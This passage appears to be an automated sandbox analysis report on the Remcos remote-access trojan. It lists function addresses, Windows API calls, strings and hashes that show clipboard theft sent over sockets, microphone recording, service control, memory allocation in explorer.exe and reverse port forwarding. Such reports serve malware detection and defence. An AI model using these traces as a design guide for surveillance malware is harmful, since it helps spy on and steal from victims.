                                                                                                                                                                                                  • Instruction ID: 01f79aac078c9204ae4226344def03f9678a0966abb138ad227abf0e83d93267
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56381d62612dfaeda6f40a421600c7779e16d03d52b50a481ca23e24a9b19417
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18417E319002099ACB14FB62DC56AEE7735AF00318F50417EF50A761E1EF7C5A8ACB99
                                                                                                                                                                                                  Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenClipboard.USER32 ref: 0041697C
                                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 0041698A
                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00416990
                                                                                                                                                                                                  • OpenClipboard.USER32 ref: 00416997
                                                                                                                                                                                                  • GetClipboardData.USER32 ref: 004169A7
                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 004169BF
                                                                                                                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                                                                                                                  • String ID: !D@
                                                                                                                                                                                                  • API String ID: 2172192267-604454484
                                                                                                                                                                                                  • Opcode ID: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                                                                                                                                  • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b64630acea7acae9f4b6bf79d34c0e4f1fbb3b6ac899b568f0dd2c6f733c1b32
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                                                                                                                                  Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                                                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                                                                                  • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                                                                                                  • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                                                                                                                                  Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 100059EA
                                                                                                                                                                                                    • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                                                                                                                                                                    • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                                                  • _free.LIBCMT ref: 100059F6
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A01
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A0C
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A17
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A22
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A2D
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A38
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A43
                                                                                                                                                                                                  • _free.LIBCMT ref: 10005A51
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.953391796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953386992.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.953391796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                                  • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                                                                                                                  • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                                                                                                                  Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _free.LIBCMT ref: 004481B5
                                                                                                                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                                                                  • _free.LIBCMT ref: 004481C1
                                                                                                                                                                                                  • _free.LIBCMT ref: 004481CC
                                                                                                                                                                                                  • _free.LIBCMT ref: 004481D7
                                                                                                                                                                                                  • _free.LIBCMT ref: 004481E2
                                                                                                                                                                                                  • _free.LIBCMT ref: 004481ED
                                                                                                                                                                                                  • _free.LIBCMT ref: 004481F8
                                                                                                                                                                                                  • _free.LIBCMT ref: 00448203
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044820E
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044821C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                  • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                                                                                  • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                                                                                                                                  Function 004451FA Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                                                                                                                                  • _free.LIBCMT ref: 00445515
                                                                                                                                                                                                  • _free.LIBCMT ref: 0044552E
                                                                                                                                                                                                  • _free.LIBCMT ref: 00445560
                                                                                                                                                                                                  • _free.LIBCMT ref: 00445569
                                                                                                                                                                                                  • _free.LIBCMT ref: 00445575
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                  • String ID: C$t'`/
                                                                                                                                                                                                  • API String ID: 1679612858-2642070891
                                                                                                                                                                                                  • Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                                                                                                                                                                  • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                                                                                                                                  Function 00411530 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Eventinet_ntoa
                                                                                                                                                                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                                                                                                                                  • API String ID: 3578746661-3604713145
                                                                                                                                                                                                  • Opcode ID: 57d06d6c52dfeba4092ae4aaac0bc016092a07c4d064bf56e84e87d0b32c376f
                                                                                                                                                                                                  • Instruction ID: 5b49fc9f60f15aadef5e91219dcc0d557585a55aed20fbc46105045b647f8dc0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57d06d6c52dfeba4092ae4aaac0bc016092a07c4d064bf56e84e87d0b32c376f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5351D531A042015BC714FB36D95AAAE36A5AB84344F40453FFA06676F2EF7C8985C7CE
                                                                                                                                                                                                  Function 0044B43C Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                                                                                                                                                                  • __fassign.LIBCMT ref: 0044B4F9
                                                                                                                                                                                                  • __fassign.LIBCMT ref: 0044B514
                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                  • String ID: t'`/
                                                                                                                                                                                                  • API String ID: 1324828854-2084328917
                                                                                                                                                                                                  • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                                                                                                  • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                                                                                                                                  Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                                                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                                                                  • API String ID: 1462127192-2001430897
                                                                                                                                                                                                  • Opcode ID: b827631b01624cec3b1a05f5300d16c98e5fb05e7b31027332e097454240baf4
                                                                                                                                                                                                  • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b827631b01624cec3b1a05f5300d16c98e5fb05e7b31027332e097454240baf4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                                                                                                                                                  Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                                                                                                  • API String ID: 2050909247-4242073005
                                                                                                                                                                                                  • Opcode ID: 7d06a24fb93ff6ee8fc7d1de39de95acdb2dde4c17e3bed0e21b448150c76676
                                                                                                                                                                                                  • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d06a24fb93ff6ee8fc7d1de39de95acdb2dde4c17e3bed0e21b448150c76676
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                                                                                                                                                  Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _strftime.LIBCMT ref: 00401D50
                                                                                                                                                                                                    • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                                                                                                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                                                                                                                                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                                                                                                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                                                                  • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                                                                                                                                  • API String ID: 3809562944-243156785
                                                                                                                                                                                                  • Opcode ID: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                                                                                                                                                  • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 623e704f1bf6e3334e0817a10f99c7145d0b27867f0db7637beef4f851c1d9f8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                                                                                                                                                                  Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                                                                                                                                  • int.LIBCPMT ref: 00410EBC
                                                                                                                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                                                                                                  • String ID: ,kG$0kG
                                                                                                                                                                                                  • API String ID: 3815856325-2015055088
                                                                                                                                                                                                  • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                                                                                                                                  • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                                                                                                                                                  Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                                                                                                                                                                  • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                                                                                                                                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                                                                                                                                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                                                                                                                                                                  • waveInStart.WINMM ref: 00401CFE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                                                                  • String ID: dMG$|MG$PG
                                                                                                                                                                                                  • API String ID: 1356121797-532278878
                                                                                                                                                                                                  • Opcode ID: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                                                                                                                                  • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e77b4b4e4653ae7db2ffa9ad3e4c491b15162175c47f56b782ba1ea702525e8d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                                                                                                                                                                  Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                                                                                                                    • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                                                                                                                                                                    • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                                                                                                                                                                    • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                                                                                                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                                                                                                                                  • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                                                                                                                                                  • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                                                                                                                                  • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                                                                                                                                  • GetMessageA.USER32 ref: 0041D591
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 0000000D.00000002.952762290.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                                                  • String ID: Remcos
                                                                                                                                                                                                  • API String ID: 1970332568-165870891
